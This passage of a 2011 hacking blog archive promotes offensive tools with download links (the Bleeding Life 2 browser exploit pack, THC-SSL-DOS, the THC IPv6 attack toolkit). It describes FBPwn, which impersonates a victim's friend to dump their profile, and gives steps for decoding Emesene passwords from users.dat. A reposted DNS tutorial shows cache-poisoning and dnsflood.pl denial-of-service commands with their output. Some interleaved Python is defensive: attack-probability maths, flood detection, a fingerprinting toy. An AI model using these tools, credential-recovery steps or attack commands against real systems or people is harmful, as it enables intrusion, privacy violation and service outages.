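        print("%-30s %s" % (pw, assess(pw)))
```

The estimate is an upper bound on the attacker's work, not a lower bound on safety: it assumes a uniform random choice from the alphabet, which real passwords are not, so a dictionary or rules-based attack finds predictable patterns far sooner than the keyspace suggests. The hash algorithm and the attacker's hardware set the guess rate, which is why the same password rates very differently against a fast unsalted hash and a slow, salted one.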

I hope you find this information useful. :)




Wednesday 9 November 2011

Encoder/Decoder Tool From Techgaun [New Release]

I am glad to release this very small encoder and decoder tool that I coded just now, around 10 minutes ago. I hope this tool will be useful for you.

Right now, the tool has the following options.

Base64 Encoding and Decoding
Rot13
URL Encoding and Decoding
String Reverse
MD5 and SHA1 Hash
HEX Encoding and Decoding
ASCII to Binary and Binary to ASCII

Encoder and Decoder Tool Online




How To Crack Emesene Messenger Passwords Easily

Emesene is a lightweight messenger for MSN users. Since Emesene stores the passwords for e-mail accounts in the users.dat file with a very simple ASCII-to-hex encoding (not real encryption), it is very easy to reverse it and get the passwords.

The users.dat file is located in /home/current_user/.config/emesene1.0/users.dat and you can view the content of this file by issuing the command as below:

cat ~/.config/emesene1.0/users.dat

The format in which the login information is saved is email:hex_encrypted_password:status, which is read back by Emesene on the next launch. Now, to get the original password, all you have to do is decode the hex string using the encoder/decoder tool.

Copy the hex-encoded part (i.e. the password part) from the users.dat file. My users.dat file contained samar_acharya@hotmail.com:74657374696e67:busy, where 74657374696e67 is the password in hex form. All I have to do is open the encoder/decoder tool, paste this hex string in the input box, select the Hex decoding option from the dropdown list and then click on Submit to get the actual password for my account.




Wednesday 26 October 2011

Bleeding Life 2 Released By Blackhat Academy

Bleeding Life 2 is a browser exploit pack that targets web browsers on the Microsoft Windows operating system with remote code execution and buffer overflow exploits. The tool can be used to launch client-side browser exploits against vulnerable users.

The wiki page of Bleeding Life enlists the exploits and features of this tool.

For download, click HERE.



SSL DOS Tool From The Hacker's Choice

On October 24, the German hacker group The Hacker's Choice released a new Denial of Service (DoS) tool that exploits a weakness in the SSL implementation to take servers down.
THC-SSL-DOS is a tool to verify the performance of SSL.
The Hacker's Choice says:

Establishing a secure SSL connection requires 15x more processing
power on the server than on the client.

THC-SSL-DOS exploits this asymmetric property by overloading the
server and knocking it off the Internet.

This problem affects all SSL implementations today.


For more information and downloads, visit THC SSL DOS Page.




Monday 12 September 2011

Facebook Pwn - Facebook Profile Dumper Tool

FBPwn is a cross-platform, Java-based Facebook profile dumper. It sends friend requests to a list of Facebook profiles and polls for the acceptance notification. Once the victim accepts the invitation, it dumps all their information, photos and friend list to a local folder.


Usage

A typical scenario is to gather the information from a user profile. The plugins are just a series of normal operations on FB, automated to increase the chance of getting the info.

Typically, you first create a new blank account for the purpose of the test. Then the friending plugin runs first, adding all the friends of the victim (to have some common friends). Then the cloning plugin asks you to choose one of the victim's friends. The cloning plugin clones only the display picture and the display name of the chosen friend of the victim and sets them on the authenticated account. Afterwards, a friend request is sent to the victim's account. The dumper polls, waiting for the friend request to be accepted. As soon as the victim accepts the friend request, the dumper starts to save all accessible HTML pages (info, images, tags, etc.) for offline examination.

After a few minutes, the victim will probably unfriend the fake account after he/she figures out it's a fake, but by then it's probably too late!

Check FBPwn Google Code Page



LinuxFoundation.org, Linux.com and their subdomains hacked

Linuxfoundation.org, linux.com and their subdomains have been compromised by hackers, and the Linux Foundation has taken all the related servers down for clean-up.

The index page of linuxfoundation.org and linux.com both state:

Linux Foundation infrastructure including LinuxFoundation.org, Linux.com, and their subdomains are down for maintenance due to a security breach that was discovered on September 8, 2011. The Linux Foundation made this decision in the interest of extreme caution and security best practices. We believe this breach was connected to the intrusion on kernel.org.

We are in the process of restoring services in a secure manner as quickly as possible. As with any intrusion and as a matter of caution, you should consider the passwords and SSH keys that you have used on these sites compromised. If you have reused these passwords on other sites, please change them immediately. We are currently auditing all systems and will update this statement when we have more information.

We apologize for the inconvenience. We are taking this matter seriously and appreciate your patience. The Linux Foundation infrastructure houses a variety of services and programs including Linux.com, Open Printing, Linux Mark, Linux Foundation events and others, but does not include the Linux kernel or its code repositories.

Please contact us at info@linuxfoundation.org with questions about this matter.

The Linux Foundation




Read more...

Sunday 21 August 2011

Web Server[HTTP] Fingerprinting With httprint

Earlier I posted about web server fingerprinting using telnet; however, more sophisticated tools have been developed, and one of them is httprint. httprint is a web server fingerprinting tool. It relies on web server characteristics to accurately identify web servers, even when they have been obfuscated by changing the server banner strings or by plug-ins such as mod_security or ServerMask. httprint can also be used to detect web-enabled devices which do not have a server banner string, such as wireless access points, routers, switches, cable modems, etc. httprint uses text signature strings, and it is very easy to add signatures to the signature database.

Features

-Identification of web servers despite the banner string and any other obfuscation. httprint can successfully identify the underlying web servers when their headers are mangled by patching the binary, by modules such as mod_security.c, or by commercial products such as ServerMask.

-Inventorying of web-enabled devices such as printers, routers, switches, wireless access points, etc.

-Customisable web server signature database. To add new signatures, simply cut and paste the httprint output against unknown servers into the signatures text file.

-Confidence ratings. httprint now picks the best matches based on confidence ratings, derived using a fuzzy logic technique, instead of going by the highest weight. More details on the significance of confidence ratings can be found in section 8.4 of the Introduction to HTTP Fingerprinting paper.

-Multi-threaded engine. httprint v301 is a complete rewrite, featuring a multi-threaded scanner that processes multiple hosts in parallel, which greatly reduces scanning time. (Multi-threading is not yet supported in the FreeBSD version.)

-SSL information gathering. httprint now gathers SSL certificate information, which helps you identify expired SSL certificates, ciphers used, certificate issuer, and other such SSL-related details.

-Automatic SSL detection. httprint can detect whether a port is SSL-enabled or not, and can automatically switch to SSL connections when needed.

-Automatic traversal of HTTP 301 and 302 redirects. Many servers that have moved their content to other servers send a default redirect response to all HTTP requests. httprint now follows the redirection and fingerprints the new server it points to. This feature is enabled by default and can be turned off if needed.

-Ability to import web servers from nmap network scans. httprint can import nmap's XML output files.

-Reports in HTML, CSV and XML formats.

-Available on Linux, Mac OS X, FreeBSD (command line only) and Win32 (command line and GUI).

For more information and downloads, check this link.

Also, if you want to learn more about webserver fingerprinting, I would highly recommend you to read this paper.



Read more...

Friday 19 August 2011

IPV6 Attacking Toolkit - THC-ipV6 Toolkit Released

The famous hacker group The Hacker's Choice (THC) has released a set of tools to attack the IPv6 protocol. IPv6 is the successor of the IPv4 protocol and was proposed because of the exhaustion of the IPv4 address pool.

THC writes:

THC is proud to be the first who are releasing a comprehensive attack toolkit for the IPv6 protocol suite. It comprises state-of-the-art tools for alive scanning, man-in-the-middle attacks, denial-of-service etc. which exploit inherent vulnerabilities in IPv6. Included is a fast and easy to use packet crafting library to create your own attack tools.


For more information on the project, visit the THC IPv6 Project Page.

Download Here



Read more...

Backtrack 5 R1 Released

BackTrack, the most widely used Linux-based penetration testing distribution, had a new release yesterday. BackTrack 5 R1 was released on August 18 and adds 30 new tools to the famous hacker's distro.

Offsec team says:


We are really happy with this release, and believe that as with every release, this is our best one yet. Some pesky issues such as rfkill in VMWare with rtl8187 issues have been fixed, which provides for a much more solid experience with BackTrack.
We’ve released Gnome and KDE ISO images for 32 and 64 bit (no arm this release, sorry!), as well as a VMWare image of a 32 bit Gnome install, with VMWare Tools pre-installed.


For downloads, visit Backtrack Download Page.





Read more...

Monday 25 July 2011

Wireshark 1.6.1 stable version released

The stable version of Wireshark 1.6.1 was released recently (July 18). Wireshark is the world's foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto standard across many industries and educational institutions.

To download Wireshark, visit this link.

Read more...

Tuesday 12 July 2011

Search Exploits & Vulnerability With Exploitsearch.net

The site, www.exploitsearch.net, is an attempt at cross referencing data from various sources and making the resulting database available to everyone.

Unlike other exploit search engines which are simply custom google searches, this site actually crawls the source sites and parses the contained data. Once the data is collected and parsed, it is inserted into the www.exploitsearch.net database and becomes available for searching.

www.exploitsearch.net

It currently uses data from NVD, OSVDB, SecurityFocus, Exploit-DB, Metasploit, Nessus, OpenVAS and PacketStorm. It comes in handy for better results. :)

Read more...

Thursday 9 June 2011

Advanced HTTP Fingerprinting With httprecon

One of the first steps in web server hacking is fingerprinting, to gather information about the web server and the various modules applied to it. Fingerprinting a web server manually can be cumbersome, so some good folks have developed an advanced open-source fingerprinting tool known as httprecon.

*Description from official webpage:

The httprecon project is doing some research in the field of web server fingerprinting, also known as http fingerprinting. The goal is the highly accurate identification of given httpd implementations. This is very important within professional vulnerability analysis.

Besides the discussion of different approaches and the documentation of gathered results, an implementation for automated analysis is also provided. This software shall improve the ease and efficiency of this kind of enumeration. Traditional approaches such as banner grabbing, status code enumeration and header ordering analysis are used. However, many other analysis techniques were introduced to increase the possibilities of accurate web server fingerprinting.

Check the Page of httprecon project
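Both the httprint post above and httprecon's description rest on the same observation: rewriting the Server banner leaves the rest of the response (reason phrase, header order and so on) untouched, so a masked server still matches its real signature. The following is an added illustration of that idea in Python. It is my own code, not httprint's or httprecon's, and the signature table, the feature weights and the two responses are all constructed for the example; the real tools use their own signature formats and many more probes.

```python
"""Toy header-order fingerprinting of HTTP responses (added illustration)."""
import difflib

# Constructed toy signature database: the status reason phrase and the order in
# which response headers appear.  Illustrative only, NOT httprint/httprecon data.
SIGNATURES = {
    "apache-like": {
        "reason": "OK",
        "headers": ["Date", "Server", "Last-Modified", "ETag", "Accept-Ranges",
                    "Content-Length", "Content-Type"],
    },
    "iis-like": {
        "reason": "OK",
        "headers": ["Content-Length", "Content-Type", "Last-Modified",
                    "Accept-Ranges", "ETag", "Server", "X-Powered-By", "Date"],
    },
    "nginx-like": {
        "reason": "OK",
        "headers": ["Server", "Date", "Content-Type", "Content-Length",
                    "Last-Modified", "Connection", "Accept-Ranges"],
    },
}


def parse_response(raw: str) -> dict:
    """Reduce a raw HTTP response to the features the matcher looks at."""
    head = raw.split("\r\n\r\n", 1)[0]
    status_line, *header_lines = head.split("\r\n")
    parts = status_line.split(" ", 2)
    reason = parts[2] if len(parts) > 2 else ""
    headers = [line.split(":", 1)[0].strip() for line in header_lines if ":" in line]
    banner = next((line.split(":", 1)[1].strip()
                   for line in header_lines if line.lower().startswith("server:")), "")
    return {"reason": reason, "headers": headers, "banner": banner}


def score(features: dict, signature: dict) -> float:
    """Similarity in [0, 1]: header order weighted 0.8, reason phrase 0.2 (assumed weights)."""
    order = difflib.SequenceMatcher(None, signature["headers"], features["headers"]).ratio()
    reason = 1.0 if features["reason"] == signature["reason"] else 0.0
    return round(0.8 * order + 0.2 * reason, 3)


def fingerprint(raw: str) -> dict:
    """Best signature match, its confidence, and whether the banner agrees with it."""
    features = parse_response(raw)
    ranked = sorted(((score(features, sig), name) for name, sig in SIGNATURES.items()),
                    reverse=True)
    best_score, best_name = ranked[0]
    family = best_name.split("-")[0]
    return {
        "guess": best_name,
        "confidence": best_score,
        "banner": features["banner"],
        "banner_agrees": family in features["banner"].lower(),
    }


# Constructed responses.  MASKED has an Apache-style header order but a banner
# rewritten to claim IIS; HONEST_IIS is consistent with its banner.
MASKED = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Sun, 21 Aug 2011 10:00:00 GMT\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "Last-Modified: Sat, 20 Aug 2011 09:00:00 GMT\r\n"
    "ETag: \"1234-5678\"\r\n"
    "Accept-Ranges: bytes\r\n"
    "Content-Length: 3\r\n"
    "Content-Type: text/html\r\n"
    "\r\nhi!"
)
HONEST_IIS = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Length: 3\r\n"
    "Content-Type: text/html\r\n"
    "Last-Modified: Sat, 20 Aug 2011 09:00:00 GMT\r\n"
    "Accept-Ranges: bytes\r\n"
    "ETag: \"abcd\"\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "X-Powered-By: ASP.NET\r\n"
    "Date: Sun, 21 Aug 2011 10:00:00 GMT\r\n"
    "\r\nhi!"
)

if __name__ == "__main__":
    for label, raw in (("masked", MASKED), ("honest", HONEST_IIS)):
        print(label, fingerprint(raw))
```

From the defender's side the lesson is the one httprint's feature list states: a banner-rewriting module or product changes only the `Server` value, so a patched `fingerprint(MASKED)` still comes back as `apache-like` with the banner flagged as disagreeing. Keeping the server patched buys more than hiding its name.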

Read more...

Saturday 28 May 2011

Attacking the DNS System Tutorial

This tutorial is written by mango1122 from governmentsecurity. Since it's very informative, I have decided to post this tutorial over here.

--------------
INTRODUCTION
--------------

Domain Name System (DNS) associates various sorts of information with so-called domain names;
most importantly, it serves as the "phone book" for the Internet: it translates human-readable
computer hostnames, e.g. en.wikipedia.org, into the IP addresses that networking equipment
needs for delivering information. It also stores other information such as the list of mail exchange
servers that accept email for a given domain.

The Berkeley Internet Name Service (BIND) is the most common form of DNS server used on the Internet.
BIND typically runs on UNIX type systems. The DNS server stores information which it serves out about a
particular domain (also referred to as a namespace) in text files called zone files. A client (the resolver)
maintains a small amount of local cache which it will refer to first before looking at a local static hosts file
and then finally the DNS server. The result returned will then be cached by the client for a small period of time.

When a DNS server is contacted for a resolution query, and if it is authoritative (has the answer to the question
in its own database) for a particular domain (referred to as a zone) it will return the answer to the client. If it is
not authoritative for the domain, the DNS server will contact other name servers and eventually it will get the
answer it needs which is passed back to the client. This process is known as recursion.

Additionally the client itself can attempt to contact additional DNS servers to resolve a name. When a client does
so, it uses separate and additional queries based on referral answers from servers. This process is known as iteration.


----------------------------
ATTACKING THE DNS CACHE
----------------------------

The most common attacks on DNS can be classified as

Zone transfers or information disclosure attacks
Cache poisoning


CACHE POISONING

Let's say a client in domain xyz.com wants to resolve www.google.com.

1. The client will contact its configured DNS server and ask for www.google.com to be resolved.
This query will contain information about the client's source UDP port, IP address and a DNS transaction ID.

2. If the information is available locally, i.e. cached, it is returned to the client.

3. If not, then the client's DNS server will contact the authoritative name server for google.com and resolve the query.

4. The answer is passed back to the client and also cached locally in the DNS server of xyz.com (say ns1.xyz.com) and the client.

5. Note the client only accepts the DNS information if the server replies with the correct client's source UDP port, IP address and DNS transaction ID.




--------------------------------
Attack #1 - The Birthday Attack
--------------------------------

To poison the cache the attacker needs to

1. Send a number of resolution requests for google.com. An important thing
to note here is that each query for google.com is assigned a different transaction ID.

2. While the DNS resolves this the attacker sends a large number of spoofed replies
from ns1.google.com with different transaction IDs. The attacker hopes to guess the
correct transaction ID as used by the two name servers.

Finding the correct IP addresses is easy; we know our target, and we know the addresses of the legitimate
nameservers for the domain to be hijacked. Finding the port is slightly harder. We know that the destination
port of the recursive query is UDP port 53, but the source port is a moving target. Fortunately for our attacker,
BIND will more often than not reuse the same source port for queries on behalf of the same client. So, if the
attacker is working from an authoritative nameserver, he can first issue a request for a DNS lookup of a
hostname on his server. When the recursive query packet arrives, he can look at the source port. Chances are
this will be the same source port used when the victim sends the queries for the domain to be hijacked.
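The paragraph above says why the source port matters: when it is fixed and known, the only unknown left is the 16-bit transaction ID. The following is an added worked example, my own code rather than part of mango1122's tutorial, that computes the success probability of the birthday attack just described (Q outstanding queries against S forged replies over an ID space of N values) and contrasts it with a resolver that randomises its source port. It assumes the resolver picks distinct random IDs for the Q queries and that a randomising resolver draws ports from the range 1024-65535; both are modelling assumptions, not facts from the tutorial.

```python
"""Success probability of a DNS transaction-ID birthday attack (added worked example)."""
import math

TXID_SPACE = 2 ** 16                 # 16-bit DNS transaction ID
EPHEMERAL_PORTS = 65535 - 1024 + 1   # assumed size of a randomising resolver's source-port pool


def guess_success(id_space: int, outstanding: int, spoofed: int) -> float:
    """Probability that at least one of `spoofed` forged replies (each carrying a
    distinct random ID) matches one of `outstanding` distinct IDs the resolver is
    waiting on.  Exact hypergeometric "no overlap" product, evaluated in log space
    so that very large ID spaces do not underflow."""
    if outstanding <= 0 or spoofed <= 0:
        return 0.0
    if outstanding + spoofed > id_space:
        return 1.0                   # pigeonhole: a collision is certain
    log_no_hit = 0.0
    for i in range(spoofed):
        # the i-th forged reply must avoid all `outstanding` live IDs among the
        # id_space - i values not already used by earlier forged replies
        log_no_hit += math.log1p(-outstanding / (id_space - i))
    return 1.0 - math.exp(log_no_hit)


def replies_for(id_space: int, outstanding: int, target: float) -> int:
    """Approximate number of forged replies needed to reach `target` success
    probability, from the Poisson approximation P ~= 1 - exp(-Q*S/N)."""
    if not 0.0 < target < 1.0:
        raise ValueError("target must be strictly between 0 and 1")
    return math.ceil(-id_space * math.log1p(-target) / outstanding)


def compare(outstanding: int = 700, spoofed: int = 700) -> dict:
    """Side by side: fixed, known source port versus randomised source port."""
    fixed = guess_success(TXID_SPACE, outstanding, spoofed)
    randomised = guess_success(TXID_SPACE * EPHEMERAL_PORTS, outstanding, spoofed)
    return {"fixed_port": fixed, "randomised_port": randomised}


if __name__ == "__main__":
    print("1 query,   700 forged replies, fixed port :", guess_success(TXID_SPACE, 1, 700))
    print("700 queries, 700 forged replies, fixed port:", guess_success(TXID_SPACE, 700, 700))
    print("same, but source port randomised           :", compare()["randomised_port"])
    print("forged replies for 50%, fixed port, Q=700  :", replies_for(TXID_SPACE, 700, 0.5))
```

With a single outstanding query the attacker's 700 forged replies hit with probability 700/65536 (about 1%); with 700 queries in flight at once the same 700 replies succeed well over 99% of the time, which is the whole point of the birthday variant. Adding roughly 16 bits of source-port entropy drops that to about one in ten thousand, which is why port randomisation (and, later, measures such as 0x20 case randomisation and DNSSEC) became the standard mitigation rather than merely keeping the resolver patched.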


--------------------------------
Attack #2 - Poisoning the Cache
--------------------------------

1. To obtain the source port we use a perl script. It needs to be run from an authoritative name server which
the attacker controls to query the target name server for a hostname for which the attacker's machine is authoritative.

Another alternative would be to use a packet sniffer.

dns1.pl 10.10.10.50 www.google.com
source port: 34567

2. Now we run the second script, written by Ramon Izaguirre, called hds0.pl. The script does most of the work by spoofing the reply from ns1.google.com.

./hds0.pl (ns1.google.com) (ns1.xyz.com) (source port obtained from the earlier script) (spoof target)


To observe if the attack was successful simply query the target name server:

dig @12.12.12.12 www.google.com
www.google.com 86400 IN A 10.10.10.10

The attack is successful as google resolves to 10.10.10.10.

The script is available here: hxxp://securityvulns.com/files/birthday.pl


--------------------------------------
Attack #3 - DOS Attack on DNS servers
--------------------------------------

DNS servers, like other Internet resources, are prone to denial of service attacks. The only difference here would
be that the DNS server uses UDP for name resolution. To create a DOS attack on the DNS server a script such as
dnsflood.pl can be executed on multiple clients to create the traffic. DNSflood works by sending many thousands
of rapid DNS requests, thereby giving the server more traffic than it can handle, resulting in slower and slower
response times for legitimate requests.

The script can be obtained from - hxxp://packetstormsecurity.org/DoS/dnsflood.pl

In the following example we use the script to create a DOS effect on the DNS server and then query the DNS server for name resolution.

perl dnsflood.pl 192.168.10.1
attacked: 192.168.10.1...

To assess the impact of this attack on performance the attacker from another machine first clears his local cache and then
queries the target name server. Clearing the local cache will ensure the resolver gets the information from the server and not locally.


C:\>ipconfig /flushdns
Windows IP Configuration
Successfully flushed the DNS Resolver Cache.

C:\>nslookup
DNS request timed out.
timeout was 2 seconds.
*** Can't find server name for address 192.168.10.1: Timed out
*** Default servers are not available
Default Server: UnKnown
Address: 192.168.10.1

> ms2.xyz.com
Server: UnKnown
Address: 192.168.10.1

DNS request timed out.
timeout was 2 seconds.
DNS request timed out.
timeout was 2 seconds.
*** Request to UnKnown timed-out

>exit

If this attack was multiplied from a number of machines then the impact would be even greater.
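A flood of the kind shown above is loud in the server's own query log. The following is an added detection example, my own code and not part of mango1122's tutorial: it parses query-log lines, counts queries per source per second and reports any source whose peak rate exceeds a threshold. The log lines are constructed in the style of BIND 9's "queries" channel (an assumption; adjust the regular expression to your own server's layout), and the flooding host 192.168.10.200 and threshold are likewise made up for the example.

```python
"""Flag query floods against a DNS server from its query log (added detection example)."""
import re
from collections import defaultdict
from datetime import datetime

# Matches lines in the style of BIND 9's "queries" logging channel (assumed
# format; adjust the pattern to your own server's log layout).
LINE_RE = re.compile(
    r"^(?P<ts>\d{2}-[A-Za-z]{3}-\d{4} \d{2}:\d{2}:\d{2}\.\d{3}) "
    r"client (?P<src>[\d.]+)#(?P<port>\d+): query: (?P<qname>\S+) IN (?P<qtype>\S+)"
)


def parse_line(line: str):
    """Return the fields a flood detector needs, or None for lines that do not match."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    return {
        "ts": datetime.strptime(m.group("ts"), "%d-%b-%Y %H:%M:%S.%f"),
        "src": m.group("src"),
        "qname": m.group("qname"),
        "qtype": m.group("qtype"),
    }


def flood_sources(lines, max_qps: int) -> dict:
    """Map each source address whose one-second query count ever exceeded
    `max_qps` to that peak count.  Unparseable lines are skipped."""
    per_second = defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        per_second[(rec["src"], rec["ts"].replace(microsecond=0))] += 1
    peak = defaultdict(int)
    for (src, _second), count in per_second.items():
        peak[src] = max(peak[src], count)
    return {src: count for src, count in peak.items() if count > max_qps}


# Constructed sample log: two ordinary clients plus one host that fires 120
# queries inside a single second, the dnsflood.pl pattern described above.
NORMAL_LINES = [
    "28-May-2011 14:02:11.101 client 192.168.10.55#34567: query: www.google.com IN A + (192.168.10.1)",
    "28-May-2011 14:02:12.240 client 192.168.10.55#34568: query: ms2.xyz.com IN A + (192.168.10.1)",
    "28-May-2011 14:02:15.003 client 192.168.10.77#51000: query: mail.xyz.com IN MX + (192.168.10.1)",
]
FLOOD_LINES = [
    "28-May-2011 14:02:13.%03d client 192.168.10.200#%d: query: host%d.example.com IN A + (192.168.10.1)"
    % (i * 7, 40000 + i, i)
    for i in range(120)
]
SAMPLE_LOG = NORMAL_LINES + FLOOD_LINES

if __name__ == "__main__":
    for src, peak in flood_sources(SAMPLE_LOG, max_qps=50).items():
        print(f"possible flood from {src}: {peak} queries in one second")
```

A per-source rate is a first cut only: a distributed flood spreads the load over many addresses, so in practice you would also watch the server-wide rate and the share of queries for names that never resolve, and answer with rate limiting (BIND's response-rate limiting, for instance) or upstream filtering rather than just logging.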


------------
CONCLUSION
------------

These are only a few possible exploits involving the DNS spoofing vulnerability and there are, probably,
many more waiting to be discovered. Discovery and implementation is limited only by the active imagination of the attacker.

Read more...